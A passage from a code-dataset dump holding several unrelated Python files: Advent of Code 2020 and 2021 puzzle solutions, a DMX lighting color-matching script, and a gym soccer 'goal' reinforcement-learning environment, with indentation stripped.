model, vocoder, self.data_cfg
)
else:
generator = SACAutoRegressiveSpeechGenerator
if getattr(cfg, "teacher_forcing", False):
generator = TeacherForcingAutoRegressiveSpeechGenerator
logger.info("Teacher forcing mode for generation")
return generator(
model, vocoder, self.data_cfg,
max_iter=self.args.max_target_positions,
eos_prob_threshold=self.args.eos_prob_threshold
)
``` |
{
"source": "jonolt/dmx-colormatch",
"score": 2
} |
#### File: python/coloralgorithm/coloralgorithm.py
```python
from fixture import FixtureRGB
import math
import time
import numpy as np
def rel_diff(cur, ref) -> float:
if ref == 0:
return cur
return (ref - cur) / ref
def get_max_index(array):
max_index = 0
for i in range(len(array)):
if array[i] > array[max_index]:
max_index = i
return max_index
def get_min_index(array):
min_index = 0
for i in range(len(array)):
if array[i] < array[min_index]:
min_index = i
return min_index
def sign(val):
return math.copysign(1, val)
def divide_array(array, divisor):
for i in range(len(array)):
array[i] = int(array[i] / divisor)
if __name__ == "__main__":
org_rgbc = [1508, 1147, 2873, 5526]
org_dmx = [200, 150, 210]
#org_rgbc = [3333,1186,705,5057]
#org_dmx = [255, 200, 0]
#org_rgbc=[1604,1828,1144, 4597]
#org_dmx=[200, 235, 85]
#org_rgbc = [75,1259,5331,6775]
#org_dmx = [0,0,255]
csvpaths = (
"../data/adj_megatripar_red.csv",
"../data/adj_megatripar_green.csv",
"../data/adj_megatripar_blue.csv",
)
f = FixtureRGB(csvpaths)
# ENTER
dmx = [0, 0, 0]
last_dif_rel = 0
dif_rel = 0
matrix = np.zeros((3, 3), float)
dmx_best = np.zeros((3,3), int)
dif_best = np.zeros(3, float)
index_ch = 0 # index var
index_base_ch = 0 #index abs
repetitions = 0
first_miss = True
initialized = False
updown = 5
# LOOP
for ref in range(3):
for var in range(3):
matrix[ref, var] = rel_diff(org_rgbc[var], org_rgbc[3])
def reset():
global index_ch
global index_base_ch
global repetitions
global first_miss
global updown
global dmx
global initialized
index_ch = 0
repetitions = 0
first_miss = True
initialized = False
updown = 5
dmx = [0, 0, 0]
dmx[index_base_ch] = 255
reset()
while True:
# skip base_ch
index_ch = index_ch%len(dmx)
if index_ch == index_base_ch :
index_ch += 1
continue
last_dif_rel = dif_rel
cur_abs_rgbc = f.in_out(dmx)
dif_rel = pow(rel_diff(cur_abs_rgbc[0], cur_abs_rgbc[3]) - matrix[1, 0], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[1], cur_abs_rgbc[3]) - matrix[2, 1], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[2], cur_abs_rgbc[3]) - matrix[0, 2], 2)
if not initialized:
initialized = True
last_dif_rel = dif_rel
last_dmx = dmx[index_ch]
print(
f"{repetitions} {index_base_ch} {index_ch} {last_dif_rel:07.4f} {dif_rel:07.4f} {first_miss} [{dmx[0]:03d},{dmx[1]:03d},{dmx[2]:03d}]",
end="\n",
)
if dif_rel > last_dif_rel:
dmx[index_ch] = last_dmx
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
continue
last_dmx = dmx[index_ch]
dmx[index_ch] += updown
if dmx[index_ch] > 255:
dmx[index_ch] = 255
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
elif dmx[index_ch] < 0:
dmx[index_ch] = 0
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
if repetitions == 10:
updown = 1
if repetitions == 30:
dif_best[index_base_ch] = dif_rel
for i in range(len(dmx)):
dmx_best[index_base_ch, i] = dmx[i]
print(f"Mid Result ({index_base_ch}): {dmx_best[index_base_ch]} with {dif_best[index_base_ch]:07.4f} match")
index_base_ch += 1
if index_base_ch==len(dmx):
break
reset()
#input("Enter to continue")
best_max_ch = get_min_index(dif_best)
dmx_final = dmx_best[best_max_ch]
print(f"Final Result: {dmx_final} with {dif_best[best_max_ch]:07.4f} match")
# print(f"")
#time.sleep(0.2)
``` |
{
"source": "jonomango/advent-of-code-2020",
"score": 3
} |
#### File: advent-of-code-2020/Day 11/part1.py
```python
import copy
seats = []
with open("input.txt", "r") as file:
for line in file.readlines():
seats.append(line.replace("\n", ""))
def nearby_occupied(i, j):
occupied = 0
if i + 1 < len(seats) and seats[i + 1][j] == "#":
occupied += 1
if i - 1 >= 0 and seats[i - 1][j] == "#":
occupied += 1
if j + 1 < len(seats[i]) and seats[i][j + 1] == "#":
occupied += 1
if j - 1 >= 0 and seats[i][j - 1] == "#":
occupied += 1
if i + 1 < len(seats) and j + 1 < len(seats[i + 1]) and seats[i + 1][j + 1] == "#":
occupied += 1
if i - 1 >= 0 and j + 1 < len(seats[i - 1]) and seats[i - 1][j + 1] == "#":
occupied += 1
if i + 1 < len(seats) and j - 1 >= 0 and seats[i + 1][j - 1] == "#":
occupied += 1
if i - 1 >= 0 and j - 1 >= 0 and seats[i - 1][j - 1] == "#":
occupied += 1
return occupied
def occupy_seats():
new_seats = copy.deepcopy(seats)
changed = False
for i in range(len(seats)):
for j in range(len(seats[i])):
if seats[i][j] == "L" and nearby_occupied(i, j) == 0:
new_seats[i] = new_seats[i][:j] + "#" + new_seats[i][j + 1:]
changed = True
if seats[i][j] == "#" and nearby_occupied(i, j) >= 4:
new_seats[i] = new_seats[i][:j] + "L" + new_seats[i][j + 1:]
changed = True
return changed, new_seats
while True:
c, seats = occupy_seats()
if not c:
break
print(sum([sum([x == "#" for x in row]) for row in seats]))
```
#### File: advent-of-code-2020/Day 13/part2.py
```python
from functools import reduce
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
with open("input.txt", "r") as file:
_, busses = file.readlines()
busses = busses.split(",")
# https://brilliant.org/wiki/chinese-remainder-theorem/
a, n = [], []
for i in range(len(busses)):
if busses[i] == "x":
continue
a.append(int(busses[i]) - i)
n.append(int(busses[i]))
N = reduce(lambda x, y: x * y, n, 1)
y = [N // x for x in n]
z = [modinv(i, m) for i, m in zip(y, n)]
print(sum([i * j * k for i, j, k in zip(a, y, z)]) % N)
```
#### File: advent-of-code-2020/Day 19/part2.py
```python
import math
import copy
from functools import reduce
def matches(line, rules, rule):
# this is the base case
if "\"" in rule:
if len(line) > 0 and line[0] == rule[1]:
return [1]
else:
return []
# rule = ['1', '2']
rule = rule.split(" ")
# this stores the possible offsets from line[0:] that match
offsets = []
for i in range(len(rule)):
r = rule[i]
r = rules[r]
# first iteration, offsets is empty
if i == 0:
for s in r:
for m in matches(line, rules, s):
if m not in offsets:
offsets.append(m)
continue
new_offsets = []
for s in r:
for o in offsets:
for m in matches(line[o:], rules, s):
new_offsets.append(o + m)
offsets = new_offsets
return offsets
with open("input.txt", "r") as file:
rules, messages = file.read().split("\n\n")
# { '1': ['2 3', '3 2'] }
rules = { k: v.split(" | ") for k, v in [r.split(": ") for r in rules.split("\n")] }
rules['8'] = ['42', '42 8']
rules['11'] = ['42 31', '42 11 31']
#print("result:", matches(messages.split("\n")[0], rules, '1'))
print("solution =", sum([len(m) in matches(m, rules, '0') for m in messages.split("\n")]))
```
#### File: advent-of-code-2020/Day 20/part2.py
```python
import math
import copy
from functools import reduce
monster = [
" # ",
"# ## ## ###",
" # # # # # # ",
]
# flip an array of data over the x-axis (or y-axis)
def flip(data, xaxis):
if xaxis:
return data[::-1]
else:
return [row[::-1] for row in data]
# rotate an array of data clockwise
def rotate(data, r):
r %= 4
# bruh
if r == 0:
return data
# 90 degrees
elif r == 1:
return ["".join(row[i] for row in data[::-1]) for i in range(len(data))]
# 180 degrees
elif r == 2:
return [row[::-1] for row in data[::-1]]
# 270 degrees
else:
return ["".join(row[-i - 1] for row in data) for i in range(len(data))]
# rotate and flip according to input
def transform(data, face1, face2, should_flip):
data = rotate(data, face1 - face2 + 2)
if should_flip:
data = flip(data, face1 % 2)
return data
# get the 4 borders of a square
def borders(data):
return [
data[0],
"".join(row[-1] for row in data),
data[-1][::-1],
"".join(row[0] for row in data[::-1]),
]
# returns a list of adjecent tiles
# (id, face1, face2, flip)
def adjacent(tiles, tid):
adj = []
data = tiles[tid]
for i, d in tiles.items():
# ignore ourself
if i == tid:
continue
for s1, b1 in enumerate(borders(data)):
for s2, b2 in enumerate(borders(d)):
# matches, but needs to flip
if b1 == b2:
adj.append((i, s1, s2, True))
# no need to flip
elif b1 == b2[::-1]:
adj.append((i, s1, s2, False))
return adj
# get a corner tile id
def corner(tiles):
for tid in tiles:
adj = adjacent(tiles, tid)
# corners
if len(adj) == 2:
# side length
side = int(math.sqrt(len(tiles)))
x, y = 0, 0
if 0 not in [i for _, i, _, _ in adj]:
y = side - 1
if 1 not in [i for _, i, _, _ in adj]:
x = side - 1
return tid, x, y
return None
# make a 2D array image
def form_image(tiles):
# side length
side = int(math.sqrt(len(tiles)))
# start processing from a corner
# (id, x, y)
to_process = [corner(tiles)]
# note: (x, y) coords are grid[y][x] and grid[0][0] is top left
grid = [[None for _ in range(side)] for _ in range(side)]
grid[to_process[0][2]][to_process[0][1]] = to_process[0][0]
for curr_id, curr_x, curr_y in to_process:
# process adjacent tiles
for adj_id, face1, face2, should_flip in adjacent(tiles, curr_id):
# already processed
if adj_id in [x for row in grid for x in row]:
continue
# transform the tile so that it actually fits
tiles[adj_id] = transform(tiles[adj_id], face1, face2, should_flip)
x, y = curr_x, curr_y
if face1 == 0:
y += 1
elif face1 == 1:
x += 1
elif face1 == 2:
y -= 1
else:
x -= 1
grid[y][x] = adj_id
to_process.append((adj_id, x, y))
image = []
tile_length = len(list(tiles.values())[0])
# at this point, grid is an array of properly placed ids
# and every tile in tiles is properly sorted
for row in grid:
for i in range(1, tile_length - 1):
image.append("")
for tid in row:
image[-1] += tiles[tid][-i - 1][1:-1]
return image
# check if this matches the monster
def matches(image, xoff, yoff):
# check if matches
for i in range(len(monster[0])):
for j in range(len(monster)):
# we only care about this shit
if monster[j][i] != "#":
continue
if image[j + yoff][i + xoff] != "#":
return False
return True
# mark monsters in an image
def mark_monsters(image, inhabited):
for xoff in range(len(image) - len(monster[0])):
for yoff in range(len(image) - len(monster)):
if not matches(image, xoff, yoff):
continue
for i in range(len(monster[0])):
for j in range(len(monster)):
# we only care about this shit
if monster[j][i] != "#":
continue
inhabited[(xoff + i, yoff + j)] = None
with open("input.txt", "r") as file:
tiles = {}
# iterate over every line in a file
for tile in file.read().split("\n\n"):
tile_id, data = tile.split(":\n")
# add to dict
tiles[int(tile_id[5:])] = data.split("\n")
image = form_image(tiles)
inhabited = {}
for _ in range(4):
image = rotate(image, 1)
mark_monsters(image, inhabited)
image = flip(image, True)
for _ in range(4):
image = rotate(image, 1)
mark_monsters(image, inhabited)
print("solution:", sum(row.count("#") for row in image) - len(inhabited))
```
#### File: advent-of-code-2020/Day 23/part1.py
```python
import math
import copy
from functools import reduce
def normalize(dest, cups):
if dest < min(cups + picked):
dest = max(cups + picked)
return dest
with open("input.txt", "r") as file:
cups = list(map(int, file.read().strip()))
count = 100
for _ in range(count):
picked = cups[1:4]
cups = cups[:1] + cups[4:]
dest = normalize(cups[0] - 1, cups)
while dest in picked:
dest = normalize(dest - 1, cups)
dest = cups.index(dest) + 1
cups = cups[:dest] + picked + cups[dest:]
cups = cups[1:] + cups[:1]
print("".join(map(str, (cups + cups)[cups.index(1) + 1:][:len(cups) - 1])))
```
#### File: advent-of-code-2020/Day 5/part2.py
```python
def bsp(start, instructions):
mn, mx = 0, start
for instr in instructions:
if instr == "F" or instr == "L":
mx = (mx - mn + 1) / 2 - 1 + mn
else:
mn += (mx - mn + 1) / 2
return int(mn)
seats = [False for x in range(128 * 8)]
with open("input.txt", "r") as file:
for line in file.readlines():
row, column = bsp(127, line[:7]), bsp(7, line[7:-1])
seats[row * 8 + column] = True
for i in range(128 * 8):
if not seats[i] and seats[i - 1] and seats[i + 1]:
print(i)
``` |
{
"source": "jonomango/advent-of-code-2021",
"score": 3
} |
#### File: advent-of-code-2021/Day 3/part2.py
```python
import math
import copy
from functools import reduce
arr = []
with open("input.txt", "r") as file:
# iterate over every line in a file
for line in file.read().strip().split("\n"):
arr.append(line)
def freq(arr):
f = [0 for _ in range(len(arr[0]))]
for line in arr:
for i in range(len(line)):
if line[i] == '1':
f[i] += 1
elif line[i] == '0':
f[i] -= 1
return f
arr3 = arr.copy()
for i in range(len(arr[0])):
arr2 = arr3.copy()
arr3 = []
f = freq(arr2)
if f[i] >= 0:
for a in arr2:
if a[i] == '1':
arr3.append(a)
else:
for a in arr2:
if a[i] == '0':
arr3.append(a)
if len(arr3) == 1:
break
o = int(arr3[0], 2)
arr3 = arr.copy()
for i in range(len(arr[0])):
arr2 = arr3.copy()
arr3 = []
f = freq(arr2)
if f[i] < 0:
for a in arr2:
if a[i] == '1':
arr3.append(a)
else:
for a in arr2:
if a[i] == '0':
arr3.append(a)
if len(arr3) == 1:
break
c = int(arr3[0], 2)
print(o * c)
```
#### File: advent-of-code-2021/Day 6/part2.py
```python
import math
import copy
from functools import reduce
fish = [0 for _ in range(9)]
with open("input.txt", "r") as f:
for x in f.read().split(","):
fish[int(x)] += 1
def simulate(f):
n = f[0]
f = f[1:]
f.append(n)
f[6] += n
return f
for i in range(256):
fish = simulate(fish)
print(sum(fish))
``` |
{
"source": "jonomon/gym-goal",
"score": 3
} |
#### File: gym_goal/envs/goal_env.py
```python
import numpy as np
import math
import gym
import pygame
from gym import spaces, error
from gym.utils import seeding
import sys
from .config import PLAYER_CONFIG, BALL_CONFIG, GOAL_AREA_LENGTH, GOAL_AREA_WIDTH, GOAL_WIDTH, GOAL_DEPTH, KICKABLE, \
INERTIA_MOMENT, MINPOWER, MAXPOWER, PITCH_LENGTH, PITCH_WIDTH, CATCHABLE, CATCH_PROBABILITY, SHIFT_VECTOR, \
SCALE_VECTOR, LOW_VECTOR, HIGH_VECTOR
from .util import bound, bound_vector, angle_position, angle_between, angle_difference, angle_close, norm_angle, \
vector_to_tuple
# actions
KICK = "kick"
DASH = "dash"
TURN = "turn"
TO_BALL = "toball"
SHOOT_GOAL = "shootgoal"
TURN_BALL = "turnball"
DRIBBLE = "dribble"
KICK_TO = "kickto"
ACTION_LOOKUP = {
0: KICK_TO,
1: SHOOT_GOAL,
2: SHOOT_GOAL,
}
# field bounds seem to be 0, PITCH_LENGTH / 2, -PITCH_WIDTH / 2, PITCH_WIDTH / 2
PARAMETERS_MIN = [
np.array([0, -PITCH_WIDTH / 2]), # -15
np.array([-GOAL_WIDTH / 2]), # -7.01
np.array([-GOAL_WIDTH / 2]), # -7.01
]
PARAMETERS_MAX = [
np.array([PITCH_LENGTH, PITCH_WIDTH / 2]), # 40, 15
np.array([GOAL_WIDTH / 2]), # 7.01
np.array([GOAL_WIDTH / 2]), # 7.01
]
def norm(vec2d):
# from numpy.linalg import norm
# faster to use custom norm because we know the vectors are always 2D
assert len(vec2d) == 2
return math.sqrt(vec2d[0]*vec2d[0] + vec2d[1]*vec2d[1])
class GoalEnv(gym.Env):
# metadata = {'render.modes': ['human', 'rgb_array']}
metadata = {'render.modes': ['human']} # cannot use rgb_array at the moment due to frame skip between actions
_VISUALISER_SCALE_FACTOR = 20
_VISUALISER_DELAY = 120 # fps
def __init__(self):
""" The entities are set up and added to a space. """
self.np_random = None
self.entities = []
self.player = None
self.ball = None
self.goalie = None
self.states = []
self.render_states = []
self.window = None
self.time = 0
self.max_time = 100
num_actions = len(ACTION_LOOKUP)
self.action_space = spaces.Tuple((
spaces.Discrete(num_actions), # actions
spaces.Tuple( # parameters
tuple(spaces.Box(PARAMETERS_MIN[i], PARAMETERS_MAX[i], dtype=np.float32) for i in range(num_actions))
)
))
self.observation_space = spaces.Tuple((
# spaces.Box(low=0., high=1., shape=self.get_state().shape, dtype=np.float32), # scaled states
spaces.Box(low=LOW_VECTOR, high=HIGH_VECTOR, dtype=np.float32), # unscaled states
spaces.Discrete(200), # internal time steps (200 limit is an estimate)
))
self.seed()
def step(self, action):
"""
Take a full, stabilised update.
Parameters
----------
action (ndarray) :
Returns
-------
ob, reward, episode_over, info : tuple
ob (object) :
reward (float) :
terminal (bool) :
info (dict) :
"""
act_index = action[0]
act = ACTION_LOOKUP[act_index]
param = action[1][act_index]
param = np.clip(param, PARAMETERS_MIN[act_index], PARAMETERS_MAX[act_index])
steps = 0
self.time += 1
if self.time == self.max_time:
reward = -self.ball.goal_distance()
end_episode = True
state = self.get_state()
return (state, 0), reward, end_episode, {}
end_episode = False
run = True
reward = 0.
while run:
steps += 1
reward, end_episode = self._update(act, param)
run = not end_episode
if run:
run = not self.player.can_kick(self.ball)
if act == DRIBBLE:
run = not self.ball.close_to(param) or run
elif act == KICK_TO:
run = norm(self.ball.velocity) > 0.1 or run
elif act == TURN_BALL:
theta = angle_between(self.player.position, self.ball.position)
run = not angle_close(theta, param[0]) or run
elif act == SHOOT_GOAL:
run = not end_episode
else:
run = False
state = self.get_state()
return (state, steps), reward, end_episode, {}
def _update(self, act, param):
"""
Performs a single transition with the given action,
returns the reward and terminal status.
"""
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
self.render_states.append(self.states[-1])
self._perform_action(act, param, self.player)
self.goalie.move(self.ball, self.player)
for entity in self.entities:
entity.update()
self._resolve_collisions()
return self._terminal_check()
def reset(self):
# TODO: implement reset for each entity to avoid creating new objects and reduce duplicate code
initial_player = np.array((0, self.np_random.uniform(-PITCH_WIDTH / 2, PITCH_WIDTH / 2)))
angle = angle_between(initial_player, np.array((PITCH_LENGTH / 2, 0)))
self.player = Player(initial_player, angle)
MACHINE_EPSILON = 1e-12 # ensure always kickable on first state
# fixes seeded runs changing between machines due to minor precision differences,
# specifically from angle_position due to cos and sin approximations
initial_ball = initial_player + (KICKABLE - MACHINE_EPSILON) * angle_position(angle)
#initial_ball = initial_player + KICKABLE * angle_position(angle)
self.ball = Ball(initial_ball)
initial_goalie = self._keeper_target(initial_ball)
angle2 = angle_between(initial_goalie, initial_ball)
self.goalie = Goalie(initial_goalie, angle2)
self.entities = [self.player, self.goalie, self.ball]
self._update_entity_seeds()
self.states = []
self.render_states = []
self.time = 0
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
self.render_states.append(self.states[-1])
return self.get_state(), 0
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
self.reset()
self._update_entity_seeds()
return [seed]
def _update_entity_seeds(self):
# will be empty at initialisation, call again after creating all entities
for entity in self.entities:
entity.np_random = self.np_random
@staticmethod
def _keeper_line(ball):
""" Finds the line the keeper wants to stay to. """
grad = -ball[1] / (PITCH_LENGTH / 2 - ball[0])
yint = ball[1] - grad * ball[0]
return grad, yint
def _keeper_target(self, ball):
""" Target the keeper wants to move towards. """
grad, yint = self._keeper_line(ball)
if ball[0] < PITCH_LENGTH / 2 - GOAL_AREA_LENGTH:
xval = ball[0]
else:
if ball[1] < -GOAL_AREA_WIDTH / 2:
xval = (-GOAL_AREA_WIDTH / 2 - yint) / grad
else:
xval = (GOAL_AREA_WIDTH / 2 - yint) / grad
xval = bound(xval, PITCH_LENGTH / 2 - GOAL_AREA_LENGTH, PITCH_LENGTH / 2)
yval = bound(grad * xval + yint, -GOAL_AREA_WIDTH / 2, GOAL_AREA_WIDTH / 2)
return np.array((xval, yval))
def get_state(self):
""" Returns the representation of the current state. """
state = np.concatenate((
self.player.position,
self.player.velocity,
[self.player.orientation],
self.goalie.position,
self.goalie.velocity,
[self.goalie.orientation],
self.ball.position,
self.ball.velocity))
#return self.scale_state(state)
return state
def _load_from_state(self, state):
assert len(state) == len(self.get_state())
self.player.position[0] = state[0]
self.player.position[1] = state[1]
self.player.velocity[0] = state[2]
self.player.velocity[1] = state[3]
self.player.orientation = state[4]
self.goalie.position[0] = state[5]
self.goalie.position[1] = state[6]
self.goalie.velocity[0] = state[7]
self.goalie.velocity[1] = state[8]
self.goalie.orientation = state[9]
self.ball.position[0] = state[10]
self.ball.position[1] = state[11]
self.ball.velocity[0] = state[12]
self.ball.velocity[1] = state[13]
def _perform_action(self, act, parameters, agent):
""" Applies for selected action for the given agent. """
if act == KICK:
agent.kick_ball(self.ball, parameters[0], parameters[1])
elif act == DASH:
agent.dash(parameters[0])
elif act == TURN:
agent.turn(parameters[0])
elif act == TO_BALL:
agent.to_ball(self.ball)
elif act == SHOOT_GOAL:
agent.shoot_goal(self.ball, parameters[0])
elif act == TURN_BALL:
agent.turn_ball(self.ball, parameters[0])
elif act == DRIBBLE:
agent.dribble(self.ball, parameters)
elif act == KICK_TO:
agent.kick_to(self.ball, parameters[0])
else:
raise error.InvalidAction("Action not recognised: ", act)
def _resolve_collisions(self):
""" Shift apart all colliding entities with one pass. """
for index, entity1 in enumerate(self.entities):
for entity2 in self.entities[index + 1:]:
if entity1.colliding(entity2):
entity1.decollide(entity2)
def _terminal_check(self):
""" Determines if the episode is ended, and the reward. """
if self.ball.in_net():
end_episode = True
reward = 50
elif self.goalie.can_catch(self.ball) or not self.ball.in_field():
end_episode = True
reward = -self.ball.goal_distance()
else:
end_episode = False
reward = 0
if end_episode:
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
return reward, end_episode
def _is_stable(self):
""" Determines whether objects have stopped moving. """
speeds = [norm(entity.velocity) for entity in self.entities]
return max(speeds) < 0.1
@staticmethod
def scale_state(state):
""" Scale state variables between 0 and 1. """
scaled_state = (state + SHIFT_VECTOR) / SCALE_VECTOR
return scaled_state
@staticmethod
def unscale_state(scaled_state):
""" Unscale state variables. """
state = (scaled_state * SCALE_VECTOR) - SHIFT_VECTOR
return state
def __draw_internal_state(self, internal_state, fade=False):
""" Draw the field and players. """
player_position = internal_state[0]
player_orientation = internal_state[1]
goalie_position = internal_state[2]
goalie_orientation = internal_state[3]
ball_position = internal_state[4]
ball_size = BALL_CONFIG['SIZE']
self.window.blit(self.__background, (0, 0))
# Draw goal and penalty areas
length = self.__visualiser_scale(PITCH_LENGTH / 2)
width = self.__visualiser_scale(PITCH_WIDTH)
self.__draw_vertical(length, 0, width)
self.__draw_box(GOAL_AREA_WIDTH, GOAL_AREA_LENGTH)
# self.draw_box(PENALTY_AREA_WIDTH, PENALTY_AREA_LENGTH)
depth = length + self.__visualiser_scale(GOAL_DEPTH)
self.__draw_horizontal(width / 2 - self.__visualiser_scale(GOAL_WIDTH / 2), length, depth)
self.__draw_horizontal(width / 2 + self.__visualiser_scale(GOAL_WIDTH / 2), length, depth)
# self.draw_radius(vector(0, 0), CENTRE_CIRCLE_RADIUS)
# Draw Players
self.__draw_player(player_position, player_orientation, self.__white)
if not fade:
self.__draw_radius(player_position, KICKABLE)
self.__draw_player(goalie_position, goalie_orientation, self.__red)
if not fade:
self.__draw_radius(goalie_position, CATCHABLE)
# Draw ball
self.__draw_entity(ball_position, ball_size, self.__black)
pygame.display.update()
def __visualiser_scale(self, value):
''' Scale up a value. '''
return int(self._VISUALISER_SCALE_FACTOR * value)
def __upscale(self, position):
''' Maps a simulator position to a field position. '''
pos1 = self.__visualiser_scale(position[0])
pos2 = self.__visualiser_scale(position[1] + PITCH_WIDTH / 2)
return np.array([pos1, pos2])
def __draw_box(self, area_width, area_length):
""" Draw a box at the goal line. """
lower_corner = self.__visualiser_scale(PITCH_WIDTH / 2 - area_width / 2)
upper_corner = lower_corner + self.__visualiser_scale(area_width)
line = self.__visualiser_scale(PITCH_LENGTH / 2 - area_length)
self.__draw_vertical(line, lower_corner, upper_corner)
self.__draw_horizontal(lower_corner, line, self.__visualiser_scale(PITCH_LENGTH / 2))
self.__draw_horizontal(upper_corner, line, self.__visualiser_scale(PITCH_LENGTH / 2))
def __draw_player(self, position, orientation, colour):
''' Draw a player with given position and orientation. '''
size = PLAYER_CONFIG['SIZE']
self.__draw_entity(position, size, colour)
radius_end = size * angle_position(orientation)
pos = vector_to_tuple(self.__upscale(position))
end = vector_to_tuple(self.__upscale(position + radius_end))
pygame.draw.line(self.window, self.__black, pos, end)
def __draw_radius(self, position, radius):
""" Draw an empty circle. """
pos = vector_to_tuple(self.__upscale(position))
radius = self.__visualiser_scale(radius)
pygame.draw.circle(self.window, self.__white, pos, radius, 1)
def __draw_entity(self, position, size, colour):
""" Draws an entity as a ball. """
pos = vector_to_tuple(self.__upscale(position))
radius = self.__visualiser_scale(size)
pygame.draw.circle(self.window, colour, pos, radius)
def __draw_horizontal(self, yline, xline1, xline2):
""" Draw a horizontal line. """
pos1 = (xline1, yline)
pos2 = (xline2, yline)
pygame.draw.line(self.window, self.__white, pos1, pos2)
def __draw_vertical(self, xline, yline1, yline2):
""" Draw a vertical line. """
pos1 = (xline, yline1)
pos2 = (xline, yline2)
pygame.draw.line(self.window, self.__white, pos1, pos2)
def __draw_render_states(self):
"""
Draw the internal states from the last action.
"""
length = len(self.render_states)
for i in range(0, length):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
self.__draw_internal_state(self.render_states[i])
self.__clock.tick(self._VISUALISER_DELAY)
self.render_states = [] # clear states for next render
def render(self, mode='human', close=False):
if close:
pygame.display.quit()
pygame.quit()
self.window = None
return
self._initialse_window()
self.__draw_render_states()
#img = self._get_image()
#if mode == 'rgb_array':
# return img
# elif mode == 'human':
# from gym.envs.classic_control import rendering
# if self.viewer is None:
# self.viewer = rendering.SimpleImageViewer(SCREEN_WIDTH, SCREEN_HEIGHT)
# self.viewer.imshow(img)
def _initialse_window(self):
# initialise visualiser
if self.window is None:
pygame.init()
width = self.__visualiser_scale(PITCH_LENGTH / 2 + GOAL_DEPTH)
height = self.__visualiser_scale(PITCH_WIDTH)
self.window = pygame.display.set_mode((width, height))
self.__clock = pygame.time.Clock()
size = (width, height)
self.__background = pygame.Surface(size)
self.__white = pygame.Color(255, 255, 255, 0)
self.__black = pygame.Color(0, 0, 0, 0)
self.__red = pygame.Color(255, 0, 0, 0)
self.__background.fill(pygame.Color(0, 125, 0, 0))
def save_render_states(self, dir, prefix, index=0):
self._initialse_window()
import os
for s in self.render_states:
self.__draw_internal_state(s)
pygame.image.save(self.window, os.path.join(dir, prefix+"_"+str("{:04d}".format(index))+".jpeg"))
index += 1
return index
class Entity:
""" This is a base entity class, representing moving objects. """
def __init__(self, config):
self.rand = config['RAND']
self.accel_max = config['ACCEL_MAX']
self.speed_max = config['SPEED_MAX']
self.power_rate = config['POWER_RATE']
self.decay = config['DECAY']
self.size = config['SIZE']
self.position = np.array([0., 0.])
self.velocity = np.array([0., 0.])
self.np_random = None # overwritten by seed()
def update(self):
""" Update the position and velocity. """
self.position += self.velocity
self.velocity *= self.decay
def accelerate(self, power, theta):
""" Applies a power to the entity in direction theta. """
rrand = self.np_random.uniform(-self.rand, self.rand)
theta = (1 + rrand) * theta
rmax = self.rand * norm(self.velocity)
noise = self.np_random.uniform(-rmax, rmax, size=2)
rate = float(power) * self.power_rate
acceleration = rate * angle_position(theta) + noise
acceleration = bound_vector(acceleration, self.accel_max)
self.velocity += acceleration
self.velocity = bound_vector(self.velocity, self.speed_max)
def decollide(self, other):
""" Shift overlapping entities apart. """
overlap = (self.size + other.size - self.distance(other)) / 2
theta1 = angle_between(self.position, other.position)
theta2 = angle_between(other.position, self.position)
self.position += overlap * angle_position(theta2)
other.position += overlap * angle_position(theta1)
self.velocity *= -1
other.velocity *= -1
def colliding(self, other):
""" Check if two entities are overlapping. """
dist = self.distance(other)
return dist < self.size + other.size
def distance(self, other):
""" Computes the euclidean distance to another entity. """
return norm(self.position - other.position)
def in_area(self, left, right, bot, top):
""" Checks if the entity is in the area. """
xval, yval = self.position
in_length = left <= xval <= right
in_width = bot <= yval <= top
return in_length and in_width
class Player(Entity):
""" This represents a player with a position,
velocity and an orientation. """
def __init__(self, position, orientation):
""" The values for this class are defined by the player constants. """
Entity.__init__(self, PLAYER_CONFIG)
self.position = position
self.orientation = orientation
def homothetic_centre(self, ball):
""" Computes the homothetic centre between the player and the ball. """
ratio = 1. / (self.size + ball.size)
position = (ball.position * self.size + self.position * ball.size)
return ratio * position
def tangent_points(self, htc):
""" Finds the tangent points on the player wrt to homothetic centre. """
diff = htc - self.position
square = sum(diff ** 2)
if square <= self.size ** 2:
delta = 0.0
else:
delta = np.sqrt(square - self.size ** 2)
xt1 = (diff[0] * self.size ** 2 + self.size * diff[1] * delta) / square
xt2 = (diff[0] * self.size ** 2 - self.size * diff[1] * delta) / square
yt1 = (diff[1] * self.size ** 2 + self.size * diff[0] * delta) / square
yt2 = (diff[1] * self.size ** 2 - self.size * diff[0] * delta) / square
tangent1 = np.array((xt1, yt1)) + self.position
tangent2 = np.array((xt1, yt2)) + self.position
tangent3 = np.array((xt2, yt1)) + self.position
tangent4 = np.array((xt2, yt2)) + self.position
if norm(tangent1 - self.position) == self.size:
return tangent1, tangent4
else:
return tangent2, tangent3
def ball_angles(self, ball, angle):
""" Determines which angle to kick the ball along. """
htc = self.homothetic_centre(ball)
tangent1, tangent2 = self.tangent_points(htc)
target = self.position + self.size * angle_position(angle)
if norm(tangent1 - target) < norm(tangent2 - target):
return angle_between(htc, tangent1)
else:
return angle_between(htc, tangent2)
def kick_power(self, ball):
""" Determines the kick power weighting given ball position. """
angle = angle_between(self.position, ball.position)
dir_diff = abs(angle_difference(angle, self.orientation))
dist = self.distance(ball)
return 1 - 0.25 * dir_diff / np.pi - 0.25 * dist / KICKABLE
def facing_ball(self, ball):
""" Determines whether the player is facing the ball. """
angle = angle_between(self.position, ball.position)
return self.facing_angle(angle)
def facing_angle(self, angle):
""" Determines whether the player is facing an angle. """
return angle_close(self.orientation, angle)
